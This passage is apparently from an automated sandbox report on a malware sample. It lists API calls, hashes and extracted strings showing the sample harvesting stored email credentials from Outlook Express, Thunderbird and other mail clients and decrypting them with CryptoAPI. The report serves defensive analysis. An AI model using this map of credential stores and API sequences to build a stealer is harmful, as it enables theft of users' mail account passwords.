                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                          • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                          • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                          • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                          • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                          • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                          • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                          • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                          • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                                          • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                          • API String ID: 2238633743-192783356
                                                                                                                                                                                                                          • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                                          • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                                          • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                                          • API String ID: 52435246-1534328989
                                                                                                                                                                                                                          • Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                                          • Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                                                          • Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                                          • Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2315226746-0
                                                                                                                                                                                                                          • Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                                          • Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                          • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                                          • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID: E$ E$ E
                                                                                                                                                                                                                          • API String ID: 1865533344-1090515111
                                                                                                                                                                                                                          • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                          • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                                                          • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                                                          • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                          • API String ID: 1864335961-3210201812
                                                                                                                                                                                                                          • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                          • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                          • API String ID: 1714764973-479759155
                                                                                                                                                                                                                          • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                          • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                          • API String ID: 3137614212-1813914204
                                                                                                                                                                                                                          • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                          • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                          • API String ID: 594115653-593045482
                                                                                                                                                                                                                          • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                          • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E123
